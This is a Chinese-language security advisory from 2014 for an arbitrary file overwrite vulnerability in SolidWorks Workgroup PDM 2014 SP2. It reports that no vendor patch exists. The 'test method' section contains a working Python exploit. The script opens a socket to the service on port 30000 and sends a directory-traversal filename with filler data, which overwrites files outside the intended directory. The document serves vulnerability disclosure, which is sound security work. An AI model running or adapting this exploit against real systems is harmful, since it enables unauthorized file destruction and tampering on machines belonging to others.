发布日期:2014-02-22
更新日期:2014-02-25
受影响系统:
SolidWorks SolidWorks Workgroup PDM 2014 SP2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65751
SolidWorks Workgroup PDM软件可帮助个人和小型工作组管理项目和控制其设计版本。
SolidWorks Workgroup PDM 2014 SP2及其他版本在实现上存在任意文件覆盖漏洞,成功利用胡可使攻击者在运行受影响应用用户上下文中覆盖任意文件。
<*来源:Mohamed Shetta
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
import socket
import struct
import ctypes
FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test
Data="A"*1028
FileSize=len(Data)
FNsz=len(FileName)
OpCode="\xD0\x07\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
s.send(OpCode)
s.send(struct.pack("I", FNsz))
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)
建议:
--------------------------------------------------------------------------------
厂商补丁:
SolidWorks
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: